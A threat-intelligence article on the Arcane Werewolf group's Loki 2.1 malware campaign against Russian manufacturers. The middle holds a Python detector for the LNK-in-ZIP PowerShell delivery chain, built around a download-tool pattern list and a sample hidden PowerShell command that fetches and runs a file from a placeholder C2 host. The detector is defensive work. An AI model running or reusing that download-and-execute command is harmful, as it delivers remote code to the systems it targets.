The cybercriminal group known as Arcane Werewolf, also identified as Mythic Likho, has enhanced its offensive capabilities with the deployment of Loki 2.1, a new iteration of their custom malware toolkit. Researchers observed this threat actor group orchestrating campaigns specifically targeting Russian manufacturing firms during October and November of 2025. This development underscores the group’s persistent focus on the manufacturing sector and their ongoing efforts in malware development.
The updated Loki malware is a notable advancement: it now works with both the Mythic and Havoc post-exploitation frameworks. This integration significantly broadens its utility and the danger it poses in the hands of sophisticated attackers. The infection vector employed by Arcane Werewolf involves meticulously crafted phishing emails designed to impersonate legitimate manufacturing companies.
Arcane Werewolf Deploys Enhanced Loki 2.1 Malware Toolkit
These deceptive emails contain links that redirect recipients to spoofed websites, which are designed to mimic authentic organizational portals. Upon clicking these malicious links, victims are prompted to download ZIP archives hosted on the attackers’ command and control (C2) infrastructure. This tactic leverages the inherent trust users place in communications appearing to originate from reputable brands and organizations.
Once a victim downloads and opens the malicious archive, the multi-stage infection process commences. Analysts from BI.ZONE identified the malware through their tracking of the distribution method and subsequent analysis of the infection chain. The initial stage of the attack is triggered when a victim opens a malicious shortcut file (LNK file) embedded within the downloaded ZIP archive.
This LNK file executes a command that utilizes PowerShell to download an executable file from the attacker-controlled server. This downloaded file is presented as an image file, functioning as a sophisticated dropper written in the Go programming language. Crucially, this dropper contains encoded malicious payloads that are concealed within its structure.
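The delivery chain described above (a shortcut opened from an extracted ZIP, which launches PowerShell to fetch an executable disguised as an image) leaves a recognisable process-creation footprint. The following detector is an added example written for this page, not code from BI.ZONE or from the reported campaign; it scores constructed process-creation events whose field names are borrowed from Sysmon Event ID 1 (ParentImage, Image, CommandLine, CurrentDirectory) but whose key=value line format, hostnames and paths are invented here. The URL, file names and archive name in the sample events are placeholders.

```python
"""
Added example (not from the BI.ZONE report): flag PowerShell launched by
explorer.exe with a download cradle that fetches a file carrying an image
extension, the pattern the LNK-in-ZIP lure described above would produce.
The log format and all sample values below are constructed for this example.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed sample events. Field names mirror Sysmon Event ID 1; the
# single-line key=value layout is an assumption made for this example.
SAMPLE_EVENTS = [
    r'ParentImage=C:\Windows\explorer.exe '
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine="powershell -w hidden -c Invoke-WebRequest http://c2.example.invalid/pic.png '
    r'-OutFile $env:TEMP\pic.png; Start-Process $env:TEMP\pic.png" '
    r'CurrentDirectory=C:\Users\u\AppData\Local\Temp\Temp1_invoice.zip',
    r'ParentImage=C:\Windows\explorer.exe Image=C:\Windows\System32\notepad.exe '
    r'CommandLine="notepad.exe readme.txt" CurrentDirectory=C:\Users\u\Documents',
    r'ParentImage=C:\Windows\System32\cmd.exe '
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe '
    r'CommandLine="powershell -File C:\scripts\backup.ps1" CurrentDirectory=C:\scripts',
]

# key=value pairs; a value is either a double-quoted string or a run of non-space chars
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')
# Common PowerShell download primitives (heuristic list, not exhaustive)
DOWNLOAD_CRADLES = re.compile(
    r"(Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer|"
    r"Net\.WebClient|\bcurl\b|\bwget\b)",
    re.IGNORECASE,
)
# A URL whose path ends in an image extension
IMAGE_URL = re.compile(r"https?://\S+\.(png|jpe?g|gif|bmp)\b", re.IGNORECASE)
# Windows Explorer extracts a double-clicked ZIP member into %TEMP%\Temp<N>_<archive>.zip
ZIP_TEMP_DIR = re.compile(r"\\Temp\\Temp\d+_[^\\]+\.zip(\\|$)", re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.IGNORECASE)


@dataclass
class Finding:
    score: int
    reasons: list


def parse_event(line: str) -> dict:
    """Turn one constructed key=value line into a dict, stripping quotes."""
    fields = {}
    for key, raw in FIELD.findall(line):
        fields[key] = raw[1:-1] if raw.startswith('"') else raw
    return fields


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def score_event(ev: dict) -> Finding:
    """One point per matched indicator; only PowerShell launches are scored."""
    reasons = []
    image = basename(ev.get("Image", ""))
    if image not in ("powershell.exe", "pwsh.exe"):
        return Finding(0, reasons)
    cmd = ev.get("CommandLine", "")
    if basename(ev.get("ParentImage", "")) == "explorer.exe":
        reasons.append("PowerShell spawned by explorer.exe (user opened a shortcut or file)")
    if DOWNLOAD_CRADLES.search(cmd):
        reasons.append("download cradle in command line")
    if IMAGE_URL.search(cmd):
        reasons.append("fetches a URL with an image extension")
    if ZIP_TEMP_DIR.search(ev.get("CurrentDirectory", "")):
        reasons.append("working directory is a ZIP extraction temp folder")
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window requested")
    return Finding(len(reasons), reasons)


def detect(lines, threshold: int = 3):
    """Return (index, Finding) for every event at or above the threshold."""
    hits = []
    for i, line in enumerate(lines):
        finding = score_event(parse_event(line))
        if finding.score >= threshold:
            hits.append((i, finding))
    return hits


if __name__ == "__main__":
    for idx, f in detect(SAMPLE_EVENTS):
        print(f"event {idx}: score {f.score}")
        for r in f.reasons:
            print("  -", r)
```

The threshold keeps an administrator's `powershell -File backup.ps1` from cmd.exe out of the results, while the explorer.exe-spawned cradle that fetches a .png from a ZIP temp folder collects every indicator. In production the same logic would sit on a SIEM over real Sysmon or EDR telemetry rather than on constructed lines.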
The Loki 2.1 Infection Mechanism and Its Implications
The Go dropper operates by decoding and sequentially executing two distinct payloads. The first payload is a malicious loader, named chrome_proxy.pdf, which establishes communication with the attacker’s C2 server. This loader collects critical system information from the compromised computer.
The data gathered includes details such as the computer’s name, the installed operating system version, internal IP addresses, and the logged-in username. This stolen information is then encrypted using the AES encryption algorithm and transmitted back to the threat actors via secure HTTPS connections, making detection more challenging.
Following data exfiltration, the loader remains active and awaits further instructions from the attackers. It is equipped to inject malicious code into legitimate running processes, upload files to the victim’s system, or extract additional sensitive data. Furthermore, the loader possesses the capability to terminate specific processes on the infected computer. This functionality grants attackers significant control, enabling them to disrupt security software or other applications that might impede their operations.
The continued evolution of Arcane Werewolf’s tactics and their consistent targeting of the manufacturing sector suggest a strategic long-term objective. The integration of Loki 2.1 with established post-exploitation frameworks indicates a refined approach to achieving deeper system compromise and data theft. The group’s reliance on social engineering through phishing emails highlights the enduring efficacy of human manipulation in cybersecurity attacks.
Looking ahead, security researchers will likely focus on monitoring for further iterations of the Loki malware and any new attack vectors employed by Arcane Werewolf. The resilience and adaptability of this threat actor group necessitate vigilant defense strategies within the manufacturing industry and beyond, as they continue to refine their tools and techniques for cyber espionage and illicit data acquisition.